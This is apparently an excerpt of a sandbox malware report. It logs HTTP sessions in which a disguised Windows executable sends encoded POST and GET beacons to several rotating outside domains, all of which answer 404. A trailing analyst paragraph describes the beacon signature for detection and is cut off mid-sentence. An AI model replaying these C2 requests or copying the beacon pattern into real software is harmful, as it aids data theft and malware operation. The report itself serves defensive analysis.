                                                    Data Raw: 65 33 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6b 6f 1b d7 11 fd ee 5f 71 cd 02 22 69 73 77 25 3b 29 6c 8b a4 e2 d8 69 bf 38 49 01 39 2d 0a c5 21 2e 97 57 e4 5a cb 5d 76 77 29 99 b1 0d 24 76 9e 88 11 23 69 80 16 41 df 45 d1 4f 05 6c d9 6a 14 3f e4 bf b0 fb 8f 7a 66 ee ee 72 49 91 b2 fc 48 1a 01 92 c8 fb 9c 3b 73 e6 cc dc 47 fd 68 c7 b7 a3 d1 40 89 5e d4 77 9b 75 fa 2b 6c 57 86 61 a3 e4 84 2d d9 91 83 c8 d9 54 25 e1 4a af db 28 05 c3 12 da 28 d9 69 d6 fb 2a 92 c2 ee c9 20 54 51 a3 f4 ce c5 5f 18 a7 50 c7 a5 9e ec ab 46 69 20 83 0d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 68 04 18 73 b2 e5 a6 a3 b6 06 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 84 21 22 27 72 55 73 6b 6b cb 6c 9f 5c 5c 32 c3 81 b4 55 dd d2 a5 75 d7 f1 36 44 a0 dc 46 29 8c 46 ae 0a 7b 4a 61 82 be ea 38 b2 51 92 ae 5b 12 bd 40 ad e7 62 b2 58 86 1c 46 be 69 87 21 06 1f f7 77 b0 80 ac f5 ba 84 44 be 67 e2 cf ca 52 49 90 e6 a0 a8 be ec 2a eb 8a c1 0d 9b f5 d0 0e 9c 41 d4 b4 8e d5 8f ae 9d 3b 7f f6 [TRUNCATED]
                                                    Data Ascii: e30Zko_q"isw%;)li8I9-!.WZ]vw)$v#iAEOlj?zfrIH;sGh@^wu+lWa-T%J((i* TQ_PFi {(P`hs~n9MV995B[!"'rUskkl\\2Uu6DF)F{Ja8Q[@bXFi!wDgRI*A;c-[fH{c\eG4#*X.]jV:H:=TV_z#rX^CM,ORq #0Zg>\4ZNEHmQ1"Rr#v\KqqV%zgsnW#)RW0QM?w".|>w/PuAAxv&W;o(Y]rVaF%uhUVV *x/6b0}a$#fOvZkc"SCic^'}v+A3'l8Q{ai`~])Wy6,UKj3k.m&Nji)kY[=B$g/`[?l&'6.5C}RrL<x%/3G)XVQ?lJn2g2/PH5B(0K07^irS38Zp<D8oNBE5xhG3SXl*N#wxRS,}/nDo [TRUNCATED]
                                                    Jun 9, 2024 18:03:06.869774103 CEST | 1236 | IN | Data Raw: 68 fb 74 d6 b1 f9 0b 74 ea 1a 7d f8 b0 e3 b5 5c b5 1e 19 da 9f 31 61 14 f8 5e f7 e9 46 01 f7 02 ee 36 85 ae 7f 01 bd 88 53 50 ef e3 f8 1e 70 c6 23 4c 70 eb b4 db 6a e5 84 c3 b6 36 79 2e 49 db 07 cb f5 11 19 3d 85 71 ff 8c 78 77 3f f9 0a 2e f2 38
                                                    Data Ascii: htt}\1a^F6SPp#Lpj6y.I=qxw?.8"^z7BF*[ y*[ u%at7^]9p`G5.0MN[smr'X-_V!? 3&G9_5x`j?sB| .E$3i
                                                    Jun 9, 2024 18:03:06.869813919 CEST | 1236 | IN | Data Raw: 4a 64 b8 ff 24 b2 64 8e 03 55 e9 d8 2b f2 d4 33 85 16 27 da f3 81 98 ed b9 39 65 05 d9 51 28 a7 e0 5f 4c 5a 91 24 73 2a c0 59 70 e1 28 02 cd 91 02 83 c3 1f 81 37 3f e3 10 8f 3d 2c 83 1c f2 1c 15 f1 b7 dc 0d 60 d6 f9 05 28 bb 86 7d 71 be 71 a6 a4
                                                    Data Ascii: Jd$dU+3'9eQ(_LZ$s*Yp(7?=,`(}qq!6oc=r?;}d"~R8:zYptj,?t'Vx&+Co>pJCTp{=.=J*\Aofe.KJwd$+z(8"{F\4j*&Q@[|
                                                    Jun 9, 2024 18:03:06.869849920 CEST | 110 | IN | Data Raw: 16 b2 55 a1 16 c7 09 9b 4e e8 07 5c c4 e3 5e 2f 1a d9 f3 b3 e0 c5 b9 b3 d3 ef ea 17 68 33 57 b2 45 21 cc ca e4 c5 5b 35 3a ae c6 e3 3d 1f 8e 85 77 39 67 64 3b f4 dd 61 a4 96 05 5d 7a 9c 31 4e e3 67 70 65 b9 24 a4 8b e7 4c e4 08 3a 41 1f 4f 4a 18
                                                    Data Ascii: UN\^/h3WE![5:=w9gd;a]z1Ngpe$L:AOJE]D.')0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    47 | 192.168.2.11 | 49759 | 194.58.112.174 | 80 | 6576 | C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jun 9, 2024 18:03:08.507133007 CEST | 1797 | OUT | POST /fo8o/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.b301.space
                                                    Origin: http://www.b301.space
                                                    Cache-Control: no-cache
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 1234
                                                    Referer: http://www.b301.space/fo8o/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                    Data Raw: 5a 6c 34 68 31 3d 4e 57 66 33 62 5a 52 6f 59 45 75 4a 36 4e 6f 4e 4d 41 6b 34 62 35 64 34 71 32 7a 54 67 50 67 71 33 31 62 65 75 65 6f 4d 73 79 47 4f 4f 57 6c 4b 75 51 54 2b 76 31 4f 33 39 41 38 42 73 4e 6e 6b 6d 46 62 71 2f 4b 6b 6f 47 58 42 53 30 31 73 76 55 6f 79 56 52 68 6b 71 71 55 63 59 73 4f 78 6d 62 6f 6b 2b 4c 6a 39 57 48 71 57 75 4d 52 34 67 35 30 44 6b 54 64 44 44 6e 46 73 45 75 2f 4e 71 4e 2b 47 74 56 31 71 55 79 56 79 66 46 64 50 42 65 55 55 50 6d 5a 48 48 57 2f 46 34 35 45 30 50 42 75 2f 62 57 71 52 72 33 44 2b 66 44 78 34 49 47 33 38 4a 42 42 46 46 73 73 41 4f 2f 69 70 57 31 33 30 41 59 51 55 66 71 30 62 43 62 65 72 70 71 56 4e 76 6a 4c 36 2f 61 41 74 36 38 6b 35 52 7a 72 52 4e 57 42 56 38 35 31 35 46 6d 4e 58 4e 4c 48 56 66 75 56 6d 75 65 44 66 39 75 42 6a 2b 6e 4c 61 57 47 32 78 38 61 78 50 49 72 4e 76 70 6a 30 37 74 47 75 42 5a 33 76 67 33 42 54 65 71 76 4a 6a 50 49 43 48 42 4c 78 63 31 64 52 4f 30 6d 49 47 41 30 59 78 51 36 44 54 39 43 73 42 4b 39 7a 37 67 53 57 6c 75 6b 7a 76 44 [TRUNCATED]
                                                    Data Ascii: Zl4h1= [TRUNCATED]
                                                    Jun 9, 2024 18:03:09.400669098 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Sun, 09 Jun 2024 16:03:09 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Content-Encoding: gzip
                                                    Data Raw: 65 33 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6b 6f 1b d7 11 fd ee 5f 71 cd 02 22 69 73 77 25 3b 29 6c 8b a4 e2 d8 69 bf 38 49 01 39 2d 0a c5 21 2e 97 57 e4 5a cb 5d 76 77 29 99 b1 0d 24 76 9e 88 11 23 69 80 16 41 df 45 d1 4f 05 6c d9 6a 14 3f e4 bf b0 fb 8f 7a 66 ee ee 72 49 91 b2 fc 48 1a 01 92 c8 fb 9c 3b 73 e6 cc dc 47 fd 68 c7 b7 a3 d1 40 89 5e d4 77 9b 75 fa 2b 6c 57 86 61 a3 e4 84 2d d9 91 83 c8 d9 54 25 e1 4a af db 28 05 c3 12 da 28 d9 69 d6 fb 2a 92 c2 ee c9 20 54 51 a3 f4 ce c5 5f 18 a7 50 c7 a5 9e ec ab 46 69 20 83 0d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 68 04 18 73 b2 e5 a6 a3 b6 06 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 84 21 22 27 72 55 73 6b 6b cb 6c 9f 5c 5c 32 c3 81 b4 55 dd d2 a5 75 d7 f1 36 44 a0 dc 46 29 8c 46 ae 0a 7b 4a 61 82 be ea 38 b2 51 92 ae 5b 12 bd 40 ad e7 62 b2 58 86 1c 46 be 69 87 21 06 1f f7 77 b0 80 ac f5 ba 84 44 be 67 e2 cf ca 52 49 90 e6 a0 a8 be ec 2a eb 8a c1 0d 9b f5 d0 0e 9c 41 d4 b4 8e d5 8f ae 9d 3b 7f f6 [TRUNCATED]
                                                    Data Ascii: e30Zko_q"isw%;)li8I9-!.WZ]vw)$v#iAEOlj?zfrIH;sGh@^wu+lWa-T%J((i* TQ_PFi {(P`hs~n9MV995B[!"'rUskkl\\2Uu6DF)F{Ja8Q[@bXFi!wDgRI*A;c-[fH{c\eG4#*X.]jV:H:=TV_z#rX^CM,ORq #0Zg>\4ZNEHmQ1"Rr#v\KqqV%zgsnW#)RW0QM?w".|>w/PuAAxv&W;o(Y]rVaF%uhUVV *x/6b0}a$#fOvZkc"SCic^'}v+A3'l8Q{ai`~])Wy6,UKj3k.m&Nji)kY[=B$g/`[?l&'6.5C}RrL<x%/3G)XVQ?lJn2g2/PH5B(0K07^irS38Zp<D8oNBE5xhG3SXl*N#wxRS,}/nDo [TRUNCATED]
                                                    Jun 9, 2024 18:03:09.400770903 CEST | 1236 | IN | Data Raw: 68 fb 74 d6 b1 f9 0b 74 ea 1a 7d f8 b0 e3 b5 5c b5 1e 19 da 9f 31 61 14 f8 5e f7 e9 46 01 f7 02 ee 36 85 ae 7f 01 bd 88 53 50 ef e3 f8 1e 70 c6 23 4c 70 eb b4 db 6a e5 84 c3 b6 36 79 2e 49 db 07 cb f5 11 19 3d 85 71 ff 8c 78 77 3f f9 0a 2e f2 38
                                                    Data Ascii: htt}\1a^F6SPp#Lpj6y.I=qxw?.8"^z7BF*[ y*[ u%at7^]9p`G5.0MN[smr'X-_V!? 3&G9_5x`j?sB| .E$3i
                                                    Jun 9, 2024 18:03:09.400814056 CEST | 1236 | IN | Data Raw: 4a 64 b8 ff 24 b2 64 8e 03 55 e9 d8 2b f2 d4 33 85 16 27 da f3 81 98 ed b9 39 65 05 d9 51 28 a7 e0 5f 4c 5a 91 24 73 2a c0 59 70 e1 28 02 cd 91 02 83 c3 1f 81 37 3f e3 10 8f 3d 2c 83 1c f2 1c 15 f1 b7 dc 0d 60 d6 f9 05 28 bb 86 7d 71 be 71 a6 a4
                                                    Data Ascii: Jd$dU+3'9eQ(_LZ$s*Yp(7?=,`(}qq!6oc=r?;}d"~R8:zYptj,?t'Vx&+Co>pJCTp{=.=J*\Aofe.KJwd$+z(8"{F\4j*&Q@[|
                                                    Jun 9, 2024 18:03:09.400852919 CEST | 110 | IN | Data Raw: 16 b2 55 a1 16 c7 09 9b 4e e8 07 5c c4 e3 5e 2f 1a d9 f3 b3 e0 c5 b9 b3 d3 ef ea 17 68 33 57 b2 45 21 cc ca e4 c5 5b 35 3a ae c6 e3 3d 1f 8e 85 77 39 67 64 3b f4 dd 61 a4 96 05 5d 7a 9c 31 4e e3 67 70 65 b9 24 a4 8b e7 4c e4 08 3a 41 1f 4f 4a 18
                                                    Data Ascii: UN\^/h3WE![5:=w9gd;a]z1Ngpe$L:AOJE]D.')0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    48 | 192.168.2.11 | 49760 | 194.58.112.174 | 80 | 6576 | C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jun 9, 2024 18:03:11.051254988 CEST | 502 | OUT | GET /fo8o/?Zl4h1=AU3XYvZFaGSlytwuLg8MPaUQqx3yoZo+slWhncsJrkz7OmZN7i/xsh6l91syvPfChHr514cSZiYi12sQUpLBck89gksl+IJQQsBNVEJ3Y46WCh4jtmLfecQ=&Pbw=PLVXbnG85 HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Host: www.b301.space
                                                    Connection: close
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                    Jun 9, 2024 18:03:11.949306965 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Sun, 09 Jun 2024 16:03:11 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Data Raw: 32 39 32 37 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 62 33 30 31 2e 73 70 61 63 65 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 [TRUNCATED]
                                                    Data Ascii: 2927<!doctype html><html class="is_adaptive" lang="ru"><head><meta charset="UTF-8"><meta name="parking" content="regru-rdap"><meta name="viewport" content="width=device-width,initial-scale=1"><title>www.b301.space</title><link rel="stylesheet" media="all" href="parking-rdap-auto.css"><link rel="icon" href="favicon.ico?1" type="image/x-icon"><script>/*<![CDATA[*/window.trackScriptLoad = function(){};/*...*/</script><script onload="window.trackScriptLoad('/manifest.js')" onerror="window.trackScriptLoad('/manifest.js', 1)" src="/manifest.js" charset="utf-8"></script><script onload="window.trackScriptLoad('/head-scripts.js')" onerror="window.trackScriptLoad('/head-scripts.js', 1)" src="/head-scripts.js" charset="utf-8"></script></head><body class="b-page b-page_type_parking b-parking b-parking_bg_light"><header class="b-parking__header b-parking__header_type_rdap"><div class="b-parking__header-note b-text"> &nbsp;<a class="b-link" href="https://reg.ru" re [TRUNCATED]
                                                    Jun 9, 2024 18:03:11.949342012 CEST | 212 | IN | Data Raw: 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 20 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 5f 73 74 79 6c 65 5f 69 6e 64 65 6e 74 20 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65
                                                    Data Ascii: class="b-page__content-wrapper b-page__content-wrapper_style_indent b-page__content-wrapper_type_hosting-static"><div class="b-parking__header-content"><h1 class="b-parking__header-title">www.b301.space</h1><p c
                                                    Jun 9, 2024 18:03:11.949398994 CEST | 1236 | IN | Data Raw: 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 2d 64 65 73 63 72 69 70 74 69 6f 6e 20 62 2d 74 65 78 74 22 3e d0 94 d0 be d0 bc d0 b5 d0 bd 20 d0 b7 d0 b0 d1 80 d0 b5 d0 b3 d0 b8 d1 81 d1 82 d1 80 d0 b8 d1 80 d0 be d0 b2 d0
                                                    Data Ascii: lass="b-parking__header-description b-text"> <br>&nbsp; &nbsp;.</p><div class="b-parking__buttons-wrapper"><a class="b-button b-button_color_reference b-button_size_no
                                                    Jun 9, 2024 18:03:11.949479103 CEST | 1236 | IN | Data Raw: 61 67 65 5f 74 79 70 65 5f 68 6f 73 74 69 6e 67 22 3e 3c 2f 73 70 61 6e 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 2d 6d 61 72 67 69 6e 5f 6c 65 66 74 2d 6c 61 72 67 65 22 3e 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 62 2d 74 69 74 6c 65 20 62
                                                    Data Ascii: age_type_hosting"></span><div class="l-margin_left-large"><strong class="b-title b-title_size_large-compact"></strong><p class="b-text b-parking__promo-subtitle l-margin_bottom-none"> &nbsp;</p></d
                                                    Jun 9, 2024 18:03:11.949497938 CEST | 1236 | IN | Data Raw: 65 67 2e 72 75 2f 68 6f 73 74 69 6e 67 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 77 77 77 2e 62 33 30 31 2e 73 70 61 63 65 26 75 74 6d 5f 6d 65 64 69 75 6d 3d 70 61 72 6b 69 6e 67 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 73 5f 6c 61 6e 64 5f 68 6f
                                                    Data Ascii: eg.ru/hosting/?utm_source=www.b301.space&utm_medium=parking&utm_campaign=s_land_host&amp;reg_source=parking_auto"> </a><p class="b-price b-parking__price"> <b class="b-price__amount">83&nbsp;<span class="char-ro
                                                    Jun 9, 2024 18:03:11.949512959 CEST | 1236 | IN | Data Raw: 6e 62 73 70 3b 43 4d 53 3c 2f 73 74 72 6f 6e 67 3e 3c 70 20 63 6c 61 73 73 3d 22 62 2d 74 65 78 74 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 70 72 6f 6d 6f 2d 64 65 73 63 72 69 70 74 69 6f 6e 22 3e d0 98 d1 81 d0 bf d0 be d0 bb d1 8c d0 b7 d1 83 d0 b9
                                                    Data Ascii: nbsp;CMS</strong><p class="b-text b-parking__promo-description"> &nbsp;CMS &nbsp; &nbsp;
                                                    Jun 9, 2024 18:03:11.949529886 CEST | 1236 | IN | Data Raw: 6e 64 5f 62 75 69 6c 64 26 61 6d 70 3b 72 65 67 5f 73 6f 75 72 63 65 3d 70 61 72 6b 69 6e 67 5f 61 75 74 6f 22 3e d0 97 d0 b0 d0 ba d0 b0 d0 b7 d0 b0 d1 82 d1 8c 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b
                                                    Data Ascii: nd_build&amp;reg_source=parking_auto"></a></div><div class="b-parking__promo-item b-parking__ssl-protection"><span class="b-parking__promo-image b-parking__promo-image_type_ssl l-margin_right-large"></span> <strong class="b-tit
                                                    Jun 9, 2024 18:03:11.949546099 CEST | 1236 | IN | Data Raw: d0 be d0 ba d0 b0 d0 b7 d0 b0 d1 82 d0 b5 d0 bb d0 b8 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 61 72 74 69 63 6c 65 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61
                                                    Data Ascii: .</p></div></div></article><script onload="window.trackScriptLoad('parking-rdap-auto.js')" onerror="window.trackScriptLoad('parking-rdap-auto.js', 1)" src="parking-rdap-auto.js" charset="utf-8"></script><script>function ondat
                                                    Jun 9, 2024 18:03:11.949561119 CEST | 1236 | IN | Data Raw: 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 20 29 20 7b 0a 20 20 20 20 20 20 20 20 76 61 72 20 73 70 61 6e 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 20 27 73 70 61 6e 2e 70 75 6e 79 2c 20 73 70 61 6e 2e
                                                    Data Ascii: rySelectorAll ) { var spans = document.querySelectorAll( 'span.puny, span.no-puny' ), t = 'textContent' in document.body ? 'textContent' : 'innerText'; var domainName = document.title.match( /(xn--|[0-9]).+\.(xn--)
                                                    Jun 9, 2024 18:03:11.949577093 CEST | 598 | IN | Data Raw: 74 69 6f 6e 28 6d 2c 65 2c 74 2c 72 2c 69 2c 6b 2c 61 29 7b 6d 5b 69 5d 3d 6d 5b 69 5d 7c 7c 66 75 6e 63 74 69 6f 6e 28 29 7b 28 6d 5b 69 5d 2e 61 3d 6d 5b 69 5d 2e 61 7c 7c 5b 5d 29 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 7d 3b 0a 20 20
                                                    Data Ascii: tion(m,e,t,r,i,k,a){m[i]=m[i]||function(){(m[i].a=m[i].a||[]).push(arguments)}; m[i].l=1*new Date();k=e.createElement(t),a=e.getElementsByTagName(t)[0],k.async=1,k.src=r,a.parentNode.insertBefore(k,a)}) (window, document, "script", "ht


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    49 | 192.168.2.11 | 49761 | 154.215.72.110 | 80 | 6576 | C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jun 9, 2024 18:03:20.161528111 CEST | 506 | OUT | GET /fo8o/?Zl4h1=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnj6KAVMa+YMk7oXS5ptBuz0n8hBJ8/Hksw4c=&Pbw=PLVXbnG85 HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Host: www.3xfootball.com
                                                    Connection: close
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                    Jun 9, 2024 18:03:21.290488958 CEST | 691 | IN | HTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Sun, 09 Jun 2024 16:03:21 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 548
                                                    Connection: close
                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                    50 | 192.168.2.11 | 49762 | 202.172.28.202 | 80
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jun 9, 2024 18:03:27.673625946 CEST | 779 | OUT | POST /fo8o/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.kasegitai.tokyo
                                                    Origin: http://www.kasegitai.tokyo
                                                    Cache-Control: no-cache
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 202
                                                    Referer: http://www.kasegitai.tokyo/fo8o/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                    Data Raw: 5a 6c 34 68 31 3d 35 4a 6c 4b 4c 7a 61 4b 56 70 31 77 4a 5a 76 70 77 56 49 68 75 42 43 58 53 48 62 6c 32 71 6c 5a 2b 79 49 57 5a 2b 61 46 2f 2f 42 72 6b 77 51 5a 6d 6c 71 64 38 54 35 32 76 54 57 45 67 77 41 56 68 42 38 69 6e 33 6f 45 74 35 2f 53 55 34 79 6d 76 43 4e 39 73 66 79 73 79 67 68 45 77 5a 4f 31 47 62 49 4d 4c 67 45 53 42 69 78 58 65 77 45 46 2f 33 64 62 2b 4f 4f 6c 58 45 70 6a 39 6f 58 75 59 57 54 43 67 42 68 32 50 37 39 7a 47 73 76 43 58 68 7a 62 50 30 42 39 74 70 48 4a 50 4e 6d 66 65 32 4f 76 2f 78 70 73 6d 4c 4d 41 46 48 55 74 45 6a 32 6f 50 6a 43 64 33 45 42 51 62 2f 41 4c 52 41 3d 3d
                                                    Data Ascii: Zl4h1=5JlKLzaKVp1wJZvpwVIhuBCXSHbl2qlZ+yIWZ+aF//BrkwQZmlqd8T52vTWEgwAVhB8in3oEt5/SU4ymvCN9sfysyghEwZO1GbIMLgESBixXewEF/3db+OOlXEpj9oXuYWTCgBh2P79zGsvCXhzbP0B9tpHJPNmfe2Ov/xpsmLMAFHUtEj2oPjCd3EBQb/ALRA==
                                                    Jun 9, 2024 18:03:28.549520969 CEST | 360 | IN | HTTP/1.1 404 Not Found
                                                    Date: Sun, 09 Jun 2024 16:03:28 GMT
                                                    Server: Apache
                                                    Content-Length: 196
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


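The five requests in sessions 47 to 50 share one shape: the same path (/fo8o/), the same leading parameter name (Zl4h1) whether sent as a POST form body or a GET query string, the same fixed IE8/Windows 7 User-Agent, three unrelated Host values within about 22 seconds, and a 404 from every one of them. The 404 body returned by www.b301.space is a registrar parking page (meta name="parking", links to reg.ru), so that domain is a dead decoy rather than a live C2. The block below is an added example, not part of the Joe Sandbox report and not code from the sample or from Joe Security. It reconstructs that beacon signature from the captured data and flags the domain rotation. The request records are constructed from the sessions above (POST bodies trimmed to the leading bytes of their Data Raw line, response bodies trimmed to their first bytes 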